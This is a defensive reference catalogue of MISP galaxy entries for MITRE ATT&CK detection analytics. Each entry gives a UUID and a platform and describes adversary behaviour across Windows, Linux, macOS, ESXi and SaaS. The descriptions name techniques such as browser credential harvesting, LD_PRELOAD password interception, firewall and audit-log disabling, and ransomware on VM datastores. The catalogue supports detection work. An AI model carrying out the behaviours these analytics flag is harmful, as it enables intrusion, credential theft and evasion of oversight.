Associated metadata
Metadata key Value
external_id AN0730
mitre_platforms ['macOS']

Analytic 0073 - AN0073

Abuse of macOS Electron apps by modifying app.asar bundles and spawning child processes (osascript, curl, sh) from Electron executables.

Internal MISP references

UUID f2c91a4c-1e79-4350-8a7e-94bc7b7b9a4c which can be used as unique global reference for Analytic 0073 - AN0073 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0073
mitre_platforms ['macOS']

Analytic 0308 - AN0308

Observation of chmod commands setting setuid/setgid bits, paired with launch of binaries under elevated execution context (e.g., root-owned binaries launched by unprivileged users).

Internal MISP references

UUID 08314a8b-becd-4853-8a6c-dd5a947b36c0 which can be used as unique global reference for Analytic 0308 - AN0308 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0308
mitre_platforms ['macOS']

Analytic 0083 - AN0083

Containerized apps or sidecar containers generating excessive outbound traffic or being leveraged for proxy networks. Includes sudden increases in network interface statistics, especially in dormant or low-utilization apps.

Internal MISP references

UUID 2fe9bf69-b1a8-4c60-8b20-c11054d31158 which can be used as unique global reference for Analytic 0083 - AN0083 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0083
mitre_platforms ['Containers']

Analytic 0038 - AN0038

Unauthorized shell or script-based access to browser config or SQLite history files, typically in ~/.config/google-chrome/, ~/.mozilla/, or ~/.var/app folders, indicating enumeration of bookmarks or saved credentials.

Internal MISP references

UUID 4a5abd9c-b4f3-4c29-9406-82aa3401c049 which can be used as unique global reference for Analytic 0038 - AN0038 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0038
mitre_platforms ['Linux']

Analytic 0380 - AN0380

Detects non-interactive or script-driven email transmission using tools like sendmail, mailx, or custom SMTP scripts by background processes, especially when sending attachments or large payloads.

Internal MISP references

UUID a311af7c-2302-4113-8cc3-d5d599fa908a which can be used as unique global reference for Analytic 0380 - AN0380 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0380
mitre_platforms ['Linux']

Analytic 0830 - AN0830

Execution of destructive CLI commands such as format flash:, format disk, or equivalent vendor-specific commands that erase filesystem structures. Detection correlates AAA logs showing privileged access with immediate format/erase commands.

Internal MISP references

UUID d970c6c7-82d0-4977-9e2e-4b27af383ca5 which can be used as unique global reference for Analytic 0830 - AN0830 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0830
mitre_platforms ['Network Devices']

Analytic 0803 - AN0803

Disabling mailbox or tenant-level audit logging, often using Set-MailboxAuditBypassAssociation or downgrading license tiers. Defender view: sudden absence of mailbox activity logging for monitored users.

Internal MISP references

UUID e42656e7-6a0e-492e-82b6-90d0d5667993 which can be used as unique global reference for Analytic 0803 - AN0803 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0803
mitre_platforms ['Office Suite']

Analytic 0039 - AN0039

Scripting or CLI tool access to ~/Library/Application Support/Google/Chrome or ~/Library/Safari bookmarks, cookies, or history databases. Detection relies on unexpected processes accessing or reading from these locations.

Internal MISP references

UUID 353e902d-b33c-466b-9276-5f224a259934 which can be used as unique global reference for Analytic 0039 - AN0039 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0039
mitre_platforms ['macOS']

Analytic 0309 - AN0309

Detection correlates message events in email and collaboration tools (e.g., Outlook, Teams) that contain regex-like patterns resembling credentials, API keys, or tokens. Anomalous forwarding or bulk copy activity of chat/email content containing secrets is flagged. Suspicious behavior includes users pasting secrets into direct messages or attaching config files with passwords.

Internal MISP references

UUID 631da3e4-5ecd-4dc9-966a-1c2633f8f24c which can be used as unique global reference for Analytic 0309 - AN0309 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0309
mitre_platforms ['Office Suite']

Analytic 0093 - AN0093

Use of chflags hidden or SetFile -a V commands to hide files, or creation of hidden files with leading '.'. Defender view: monitoring process execution and file metadata changes setting UF_HIDDEN attribute.

Internal MISP references

UUID 73931643-7fae-409c-98b3-00bd88e246e0 which can be used as unique global reference for Analytic 0093 - AN0093 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0093
mitre_platforms ['macOS']

Analytic 0390 - AN0390

Detects credential interception via malicious LD_PRELOAD-based shared libraries loaded into ssh, sudo, or scp processes. Correlates environment variable injection, unexpected library loads, and memory patching behavior.

Internal MISP references

UUID c031c27b-4d05-406a-8538-04ce1df41d35 which can be used as unique global reference for Analytic 0390 - AN0390 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0390
mitre_platforms ['Linux']

Analytic 0903 - AN0903

Detects usage of commands or binaries (e.g., netstat, PowerShell Get-NetTCPConnection) and WMI or API calls to enumerate local or remote network connections.

Internal MISP references

UUID d78b4bb3-bd0a-4e43-bc19-0a7b72f6a9d3 which can be used as unique global reference for Analytic 0903 - AN0903 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0903
mitre_platforms ['Windows']

Analytic 0930 - AN0930

ESXi shell or scripts produce long, high-entropy tokens (non-standard alphabets) in shell.log/hostd, followed by outbound flows (NSX/Zeek) with asymmetric ratios or protocol mismatches to non-management endpoints.

Internal MISP references

UUID e518b7e5-6e98-43f6-86c2-f45f684c650f which can be used as unique global reference for Analytic 0930 - AN0930 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0930
mitre_platforms ['ESXi']

Analytic 0440 - AN0440

Suspicious SaaS tenant activity involving webhook configurations pointing to external or untrusted domains. Defender perspective: repeated automated exports or suspicious webhook endpoint registrations.

Internal MISP references

UUID 4b72b349-f810-4e34-9185-b5550147147e which can be used as unique global reference for Analytic 0440 - AN0440 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0440
mitre_platforms ['SaaS']

Analytic 0404 - AN0404

Flows showing encrypted payloads with high entropy not matching TLS handshake patterns, particularly when occurring on non-standard ports. Defender observes NetFlow/IPFIX byte distribution anomalies or IDS/IPS detecting symmetric encryption patterns without associated key exchange.

Internal MISP references

UUID 94e5fd96-1fde-41fd-863d-6ef9cb8a3e1a which can be used as unique global reference for Analytic 0404 - AN0404 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0404
mitre_platforms ['Network Devices']

Analytic 0044 - AN0044

Detects snapshots or data stored in VMFS volumes from root CLI or remote agents.

Internal MISP references

UUID e59e2d8c-20cb-4a77-9d8b-1d838b01bd87 which can be used as unique global reference for Analytic 0044 - AN0044 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0044
mitre_platforms ['ESXi']

Analytic 0045 - AN0045

Detects unusual command executions and service modifications that indicate self-patching or disabling of vulnerable services post-compromise. Defenders should monitor for service stop commands, suspicious process termination, and execution of binaries or scripts aligned with known patching or service management tools outside of expected admin contexts.

Internal MISP references

UUID 16e57a41-f305-4aa7-9125-15272052419e which can be used as unique global reference for Analytic 0045 - AN0045 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0045
mitre_platforms ['Windows']

Analytic 0540 - AN0540

Detection of known tools or malware flagged by antivirus, followed by a near-term drop of a similar binary with modified signature and resumed activity (execution, C2, or persistence).

Internal MISP references

UUID 2c94147a-a556-4fa1-92f8-d3c4367f6f2e which can be used as unique global reference for Analytic 0540 - AN0540 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0540
mitre_platforms ['Windows']

Analytic 0054 - AN0054

A process loads a non-system .dylib/.so via dyld (dlopen/dlsym) from user-writable locations (~/Library, /tmp) or after the library was recently created/downloaded, often followed by network egress or persistence.

Internal MISP references

UUID 52a5dffb-f3a3-45fc-97b3-2c09fed8e0b4 which can be used as unique global reference for Analytic 0054 - AN0054 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0054
mitre_platforms ['macOS']

Analytic 0504 - AN0504

Detection of VNC service or executable starting unexpectedly, followed by user session creation and interactive desktop activity (mouse/keyboard simulation).

Internal MISP references

UUID 7c91d6c7-4591-41b1-9c08-0c0660b07d24 which can be used as unique global reference for Analytic 0504 - AN0504 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0504
mitre_platforms ['Windows']

Analytic 0450 - AN0450

Detect abnormal MFA activity within cloud service provider logs, such as repeated generation of MFA challenges for the same user session or mismatched MFA device and login origin.

Internal MISP references

UUID 824db63f-2a2c-4e3e-8e7d-49110cc63173 which can be used as unique global reference for Analytic 0450 - AN0450 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0450
mitre_platforms ['IaaS']

Analytic 0405 - AN0405

Detects forged Kerberos Golden Tickets by correlating anomalous Kerberos ticket lifetimes, unexpected encryption types (e.g., RC4 in modern domains), malformed fields in logon/logoff events, and TGS requests without preceding TGT requests. Also monitors for abnormal patterns of access associated with elevated privileges across multiple systems.

Internal MISP references

UUID fd614a66-7e99-4a69-9070-3c11036f0335 which can be used as unique global reference for Analytic 0405 - AN0405 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0405
mitre_platforms ['Windows']

Analytic 0046 - AN0046

Detects adversary attempts to monopolize control of compromised systems by issuing service stop commands, unloading vulnerable modules, or forcefully killing competing processes. Defenders should monitor audit logs and syslog for administrative utilities (systemctl, service, kill) being invoked outside of normal change management.

Internal MISP references

UUID 0a1f9686-4fd6-4719-84ef-7a590d02d1fb which can be used as unique global reference for Analytic 0046 - AN0046 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0046
mitre_platforms ['Linux']

Analytic 0604 - AN0604

Userland or kernel-level ransomware encrypting user files (Documents, Desktop) using srm, gpg, or compiled payloads. Often correlated with ransom note creation in multiple directories.

Internal MISP references

UUID 3b18d20b-94c7-41e7-8f82-99148945a74f which can be used as unique global reference for Analytic 0604 - AN0604 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0604
mitre_platforms ['macOS']

Analytic 0064 - AN0064

Attacker disables VM-related services or stops VMs forcibly to target vmdk or logs. Behavioral chain: esxcli or vim-cmd stop + audit log showing user privilege use + datastore file manipulation.

Internal MISP references

UUID 9e12e1f0-1547-4008-8755-2b3bc1c00279 which can be used as unique global reference for Analytic 0064 - AN0064 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0064
mitre_platforms ['ESXi']

Analytic 0460 - AN0460

Chain: (1) SaaS admin API or PowerShell remote session reads tenant password/authentication settings (e.g., M365 Unified Audit Log ‘Cmdlet’ with Get-MsolPasswordPolicy/Get-OrganizationConfig parameters that expose password settings); (2) same session proceeds to mailbox or tenant changes.

Internal MISP references

UUID d71a1e3e-6507-438b-9ee2-f80dc1f938d2 which can be used as unique global reference for Analytic 0460 - AN0460 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0460
mitre_platforms ['SaaS']

Analytic 0406 - AN0406

Detection of firewall tampering by monitoring processes executing netsh, PowerShell Set-NetFirewallProfile, or sc stop mpssvc. Registry modifications under HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy also indicate adversarial actions.

Internal MISP references

UUID df0f8f0a-1e92-415d-b15e-63cea928973a which can be used as unique global reference for Analytic 0406 - AN0406 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0406
mitre_platforms ['Windows']

Analytic 0640 - AN0640

CLI-based or API-based network call from the hypervisor to external staging host, shortly followed by a connection to a second external IP by a spawned process or scheduled task.

Internal MISP references

UUID e8c91885-736e-4348-ba09-2acfbdd8b176 which can be used as unique global reference for Analytic 0640 - AN0640 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0640
mitre_platforms ['ESXi']

Analytic 0407 - AN0407

Detection of iptables, nftables, or firewalld rule modifications. Correlation of sudden drops in active firewall rules with suspicious processes suggests adversarial evasion.

Internal MISP references

UUID 3327048a-e90c-47e5-9b67-d2ecaa89523c which can be used as unique global reference for Analytic 0407 - AN0407 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0407
mitre_platforms ['Linux']

Analytic 0470 - AN0470

Detects modification or truncation of /var/log/shell.log used to persist ESXi shell command history. Especially suspicious shortly after login or config changes.

Internal MISP references

UUID d17e0719-d338-47eb-a5b4-8616749584cf which can be used as unique global reference for Analytic 0470 - AN0470 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0470
mitre_platforms ['ESXi']

Analytic 0704 - AN0704

Monitor system APIs such as CFNetwork and SecureTransport for anomalies in transmitted data streams. Detect mismatches in file hashes or SSL/TLS downgrade attempts that enable manipulation of transmitted data.

Internal MISP references

UUID da6d7de2-a666-4fa3-aa53-54692a8167ae which can be used as unique global reference for Analytic 0704 - AN0704 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0704
mitre_platforms ['macOS']

Analytic 0740 - AN0740

Detects Exchange Online or on-prem transport rule changes (e.g., header stripping) and mailbox export cleanup via Remove-MailboxExportRequest, as well as admin actions via Exchange PowerShell sessions.

Internal MISP references

UUID dff59103-f6d4-4580-8316-a0528768b4b3 which can be used as unique global reference for Analytic 0740 - AN0740 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0740
mitre_platforms ['Office Suite']

Analytic 0047 - AN0047

Detects unauthorized termination of system daemons or commands issued through launchctl or kill to stop competing services or malware processes. Defenders should monitor unified logs and EDR telemetry for unusual service modifications or terminations.

Internal MISP references

UUID f84124d2-8bc6-4dae-a579-f0ddb0338a2f which can be used as unique global reference for Analytic 0047 - AN0047 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0047
mitre_platforms ['macOS']

Analytic 0074 - AN0074

Correlated registry modifications under Print Processors path, followed by DLL file creation within the system print processor directory, and DLL load by spoolsv.exe. Malicious execution often occurs during service restart or system boot, with SYSTEM-level privileges.

Internal MISP references

UUID ffe7278f-7cd1-402f-a3a7-dcc7a363b031 which can be used as unique global reference for Analytic 0074 - AN0074 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0074
mitre_platforms ['Windows']

Analytic 0408 - AN0408

Detection of PF firewall rule modifications via pfctl, socketfilterfw, or defaults write to com.apple.alf. Adversaries often disable firewall profiles entirely or whitelist malicious processes.

Internal MISP references

UUID 38c74fcf-2a4d-45cd-8465-b5d80a605bd8 which can be used as unique global reference for Analytic 0408 - AN0408 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0408
mitre_platforms ['macOS']

Analytic 0480 - AN0480

Bash, Swift, or Objective-C programs enumerate the system profile, the I/O registry, or loaded kernel extensions to identify VM artifacts.

Internal MISP references

UUID 5a92bf3c-1832-453b-8ac9-24f8688d6faf which can be used as unique global reference for Analytic 0480 - AN0480 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0480
mitre_platforms ['macOS']

Analytic 0804 - AN0804

Disabling or altering security and audit logs in SaaS admin panels (e.g., Slack, Zoom, Salesforce). Defender view: API calls or admin console changes that stop event exports or logging integrations.

Internal MISP references

UUID 967f7636-1547-4db7-921a-1b84f312a2cd which can be used as unique global reference for Analytic 0804 - AN0804 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0804
mitre_platforms ['SaaS']

Analytic 0084 - AN0084

Virtual instances or workloads generating sustained outbound data rates, often to TOR, VPN, or proxy endpoints. Often coincides with unusual IAM usage or deployed scripts (e.g., cron jobs using proxy clients).

Internal MISP references

UUID b0d018e2-0384-4e27-92ed-c9b181999fa9 which can be used as unique global reference for Analytic 0084 - AN0084 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0084
mitre_platforms ['IaaS']

Analytic 0048 - AN0048

Adversary executes commands to enumerate installed antivirus, EDR, or firewall agents using WMI, registry queries, and built-in tools (e.g., tasklist, netsh, sc query). Correlated with elevated process privileges or scripting engine usage.

Internal MISP references

UUID d0d1375d-f5c2-4271-b5e7-415c478d5e86 which can be used as unique global reference for Analytic 0048 - AN0048 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0048
mitre_platforms ['Windows']

Analytic 0840 - AN0840

Suspicious calls to dlopen(), dlsym(), or mmap with RWX flags in processes that do not typically perform dynamic module loading. Monitor anonymous memory regions executed by user processes.

Internal MISP references

UUID da7cf744-fc04-4b17-8a96-3140a4b349d6 which can be used as unique global reference for Analytic 0840 - AN0840 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0840
mitre_platforms ['macOS']

Analytic 0904 - AN0904

Detects use of netstat, ss, lsof, or custom shell scripts to list current network connections. Often paired with privilege escalation or staging.

Internal MISP references

UUID 10dcfce8-70df-4682-ab04-90279d7292f9 which can be used as unique global reference for Analytic 0904 - AN0904 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0904
mitre_platforms ['Linux']

Analytic 0409 - AN0409

Detection of firewall changes using esxcli network firewall set or vSphere API modifications. Sudden disabling of firewall rules across management interfaces is a strong adversarial signal.

Internal MISP references

UUID 1fecb6f7-e72f-452e-a078-3298cba8d481 which can be used as unique global reference for Analytic 0409 - AN0409 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0409
mitre_platforms ['ESXi']

Analytic 0049 - AN0049

Adversary runs discovery commands such as ps aux, systemctl status, or cat /etc/init.d/ to enumerate security software or services. Often occurs alongside privilege escalation or bash script execution.

Internal MISP references

UUID 3928ff9c-961e-455c-a2b1-d79ca788591f which can be used as unique global reference for Analytic 0049 - AN0049 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0049
mitre_platforms ['Linux']

Analytic 0094 - AN0094

Defenders can observe suspicious replacement or tampering of system accessibility binaries (e.g., utilman.exe, sethc.exe, osk.exe) and anomalous modifications to registry keys used to redirect accessibility programs (such as IFEO keys). Additionally, execution of cmd.exe or other suspicious binaries triggered from the login screen by SYSTEM can be correlated as part of a behavior chain.

Internal MISP references

UUID 6b5b9cd2-f6ba-4ed5-bea2-30edbf85501e which can be used as unique global reference for Analytic 0094 - AN0094 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0094
mitre_platforms ['Windows']

Analytic 0940 - AN0940

Detection of msiexec.exe running installer packages that result in anomalous process creation. Look for unexpected binaries executed by msiexec or custom action DLLs in the temp directory.

Internal MISP references

UUID 9c9db399-4f87-477b-be31-536857b7912d which can be used as unique global reference for Analytic 0940 - AN0940 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0940
mitre_platforms ['Windows']

Analytic 0490 - AN0490

Excessive inbound HTTP or TLS connections to services such as Apache or Nginx, causing worker thread exhaustion or segmentation faults.

Internal MISP references

UUID c7752951-1077-478d-9511-df852cba6b28 which can be used as unique global reference for Analytic 0490 - AN0490 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0490
mitre_platforms ['Linux']

Analytic 0505 - AN0505

Spawning of VNC-related processes (e.g., x11vnc, vncserver) coupled with authentication logs and port listening behavior on TCP 5900.

Internal MISP references

UUID 9032a591-de05-44c2-b1f6-3d711f417cce which can be used as unique global reference for Analytic 0505 - AN0505 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0505
mitre_platforms ['Linux']

Analytic 0550 - AN0550

Abuse of ClickOnce applications where rundll32.exe invokes dfshim.dll with ShOpenVerbApplication or dfsvc.exe spawns unexpected child processes or loads unsigned modules.

Internal MISP references

UUID dc4d944f-975a-4057-8edb-deb023db387c which can be used as unique global reference for Analytic 0550 - AN0550 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0550
mitre_platforms ['Windows']

Analytic 0055 - AN0055

Executable or script payloads lacking symbol information and readable strings that are created or dropped by unusual or short-lived processes.

Internal MISP references

UUID e7b2c8da-d54d-446a-a7f6-062fe234a8cc which can be used as unique global reference for Analytic 0055 - AN0055 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0055
mitre_platforms ['Windows']

Analytic 0605 - AN0605

Ransomware encrypts .vmdk, .vmx, .log, or VM config files in VMFS datastores. May rename to .locked or delete/overwrite with encrypted versions. Often correlates with shell commands run through dcui, SSH, or vSphere.

Internal MISP references

UUID 203586e5-e178-4d41-bbae-93a86f04977b which can be used as unique global reference for Analytic 0605 - AN0605 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0605
mitre_platforms ['ESXi']

Analytic 0650 - AN0650

Unsigned processes accessing system memory or launching known credential scraping tools (e.g., osascript, dylib injections) to access the Keychain or sensitive memory regions.

Internal MISP references

UUID 29370f2b-0877-458c-8ade-a9a23b8fb7b2 which can be used as unique global reference for Analytic 0650 - AN0650 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0650
mitre_platforms ['macOS']

Analytic 0056 - AN0056

Executable or binary files created without symbol tables or with stripped sections, especially by non-user shell processes or compilers invoked outside standard dev paths.

Internal MISP references

UUID 52d150da-36f4-43b4-96c4-b4fe33b012a2 which can be used as unique global reference for Analytic 0056 - AN0056 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0056
mitre_platforms ['Linux']

Analytic 0560 - AN0560

Execution of ifconfig, ip a, or access to /proc/net/ indicating collection of local interface and route configuration.

Internal MISP references

UUID 6a57daad-9d2c-4851-a46e-b6ebac607a4c which can be used as unique global reference for Analytic 0560 - AN0560 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0560
mitre_platforms ['Linux']

Analytic 0506 - AN0506

Detection of VNC-based remote control via screensharingd activity in Unified Logs along with concurrent remote login activity or suspicious user interaction.

Internal MISP references

UUID b88251d3-6406-4512-a55f-a6bc3493e2ad which can be used as unique global reference for Analytic 0506 - AN0506 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0506
mitre_platforms ['macOS']

Analytic 0065 - AN0065

Adversary stages a lure that references a remote resource (e.g., LNK/SCF/Office template). When the user opens/renders the file or a shell enumerates icons, the host automatically attempts SMB or WebDAV authentication to the attacker host. The chain is: (1) lure file is created or modified in a user-exposed location → (2) user or system accesses the lure → (3) host makes outbound NTLM (SMB 139/445 or WebDAV over 80/443) to an untrusted destination → (4) repeated attempts from multiple users/hosts or from privileged workstations.

Internal MISP references

UUID f2064dd1-8cdb-472e-b187-8d1ef18fb059 which can be used as unique global reference for Analytic 0065 - AN0065 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0065
mitre_platforms ['Windows']

Analytic 0075 - AN0075

Detects unexpected or high-volume HTTP/S/WebSocket communication from suspicious processes (e.g., PowerShell, rundll32) using uncommon user agents or mimicking browser traffic to unusual domains or IPs.

Internal MISP references

UUID 04fe83c3-d8d3-4c96-91a4-9167fa8f405a which can be used as unique global reference for Analytic 0075 - AN0075 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0075
mitre_platforms ['Windows']

Analytic 0705 - AN0705

Monitor for use of native utilities such as wevtutil.exe or PowerShell cmdlets (Get-WinEvent, Get-EventLog) to enumerate or export logs. Unusual access to security or system event channels, especially by non-administrative users or processes, should be correlated with subsequent file export or network transfer activity.

Internal MISP references

UUID 13810047-61f4-4cd0-aeda-6727d652da90 which can be used as unique global reference for Analytic 0705 - AN0705 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0705
mitre_platforms ['Windows']

Analytic 0057 - AN0057

Creation of run-only AppleScripts or Mach-O binaries lacking symbol table and string references, especially when dropped by user space scripting engines or staging apps.

Internal MISP references

UUID 1b5b9ee8-69e6-41d4-a529-aa18afcdf453 which can be used as unique global reference for Analytic 0057 - AN0057 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0057
mitre_platforms ['macOS']

Analytic 0750 - AN0750

Logon via RDP or WMI by a user account followed by uncommon command execution, file manipulation, or lateral network connections.

Internal MISP references

UUID 34c5e959-876b-4851-8ebf-bfaf97e9e609 which can be used as unique global reference for Analytic 0750 - AN0750 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0750
mitre_platforms ['Windows']

Analytic 0507 - AN0507

Detection of adversary enumeration of domain or local group memberships via native tools such as net.exe, PowerShell, or WMI. This activity may precede lateral movement or privilege escalation.

Internal MISP references

UUID d14cc347-9e27-479d-8347-1a5950cdd70c which can be used as unique global reference for Analytic 0507 - AN0507 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0507
mitre_platforms ['Windows']

Analytic 0570 - AN0570

A non-whitelisted process receives TCC camera entitlement (kTCCServiceCamera), opens AppleCamera/AVFoundation device handles, writes .mov/.mp4 artifacts to unusual locations, and/or beacons/exfiltrates soon after.

Internal MISP references

UUID db3263c7-0abc-47be-a9f3-434d255b1e0e which can be used as unique global reference for Analytic 0570 - AN0570 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0570
mitre_platforms ['macOS']

Analytic 0805 - AN0805

Detects creation or modification of crontab entries by non-root users or from abnormal parent processes, followed by the execution of uncommon binaries at scheduled intervals.

Internal MISP references

UUID 0fbbc547-37a7-4d00-a8a4-5fbcf3d27a1e which can be used as unique global reference for Analytic 0805 - AN0805 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0805
mitre_platforms ['Linux']

Analytic 0085 - AN0085

Adversary uses a tool like Ruler to insert a malicious custom form into the user's Outlook mailbox. The form is designed to auto-execute on Outlook startup or on receipt of a specially crafted email. This results in child processes launched from outlook.exe and possibly network connections or payload loading.

Internal MISP references

UUID 48cc1694-568f-4602-96e4-cbbe099c6dae which can be used as unique global reference for Analytic 0085 - AN0085 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0085
mitre_platforms ['Windows']

Analytic 0508 - AN0508

Detection of group enumeration using commands like 'id', 'groups', or 'getent group', often followed by privilege escalation or SSH lateral movement.

Internal MISP references

UUID 56a17328-c6b0-4e3d-9404-d4b8ba967a14 which can be used as unique global reference for Analytic 0508 - AN0508 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0508
mitre_platforms ['Linux']

Analytic 0580 - AN0580

Detects suspicious registry modifications under HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\*\Driver, DLL loads by spoolsv.exe of non-standard or unsigned modules, and abnormal usage of the AddMonitor API by non-installation processes. This pattern often indicates an attempt to persist a malicious DLL via the print monitor mechanism, particularly when correlated with creation of files in C:\Windows\System32 not tied to known patches or installations.

Internal MISP references

UUID 61729716-59f3-433e-a678-101c18040851 which can be used as unique global reference for Analytic 0580 - AN0580 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0580
mitre_platforms ['Windows']

Analytic 0850 - AN0850

Exploitation of system or application vulnerability (e.g., CVE-based exploit) followed by service crash, restart, or repeated failure within a short time frame, impacting application/system availability.

Internal MISP references

UUID 6bb68520-c27e-435a-86b5-eb2ce7841cb2 which can be used as unique global reference for Analytic 0850 - AN0850 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0850
mitre_platforms ['Windows']

Analytic 0058 - AN0058

Inbound binary payloads transferred over HTTP/S with compressed or encoded headers, lacking signature markers or metadata indicative of compiler/toolchain.

Internal MISP references

UUID a53e2979-2c41-44bc-b46e-13a19305e00d which can be used as unique global reference for Analytic 0058 - AN0058 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0058
mitre_platforms ['Network Devices']

Analytic 0059 - AN0059

Detects modification of shell startup/logout scripts such as ~/.bashrc, ~/.bash_profile, or /etc/profile, followed by anomalous process execution or network connections upon interactive or remote shell login.

Internal MISP references

UUID 3ae99176-ce61-4598-834b-f48d13802dcb which can be used as unique global reference for Analytic 0059 - AN0059 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0059
mitre_platforms ['Linux']

Analytic 0095 - AN0095

Identifies adversary behavior that launches commands or invokes APIs to enumerate active processes (e.g., tasklist.exe, Get-Process, or CreateToolhelp32Snapshot). Detects execution combined with parent process lineage, network session context, or remote origin.

Internal MISP references

UUID 625983e7-9736-44f4-98ba-f372b3a3d236 which can be used as unique global reference for Analytic 0095 - AN0095 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0095
mitre_platforms ['Windows']

Analytic 0905 - AN0905

Detects shell-based enumeration of active connections using netstat, lsof -i, or AppleScript-based system discovery.

Internal MISP references

UUID 635f834e-ee46-496f-aec4-23dbef04451b which can be used as unique global reference for Analytic 0905 - AN0905 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0905
mitre_platforms ['macOS']

Analytic 0950 - AN0950

Detects modification of system or application binaries by monitoring /usr/bin, /bin, and other privileged directories. Correlates file integrity monitoring (FIM) events with unexpected process executions or service restarts.

Internal MISP references

UUID 9b2ff34a-1967-46a9-b355-f9584a0715b5 which can be used as unique global reference for Analytic 0950 - AN0950 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0950
mitre_platforms ['Linux']

Analytic 0590 - AN0590

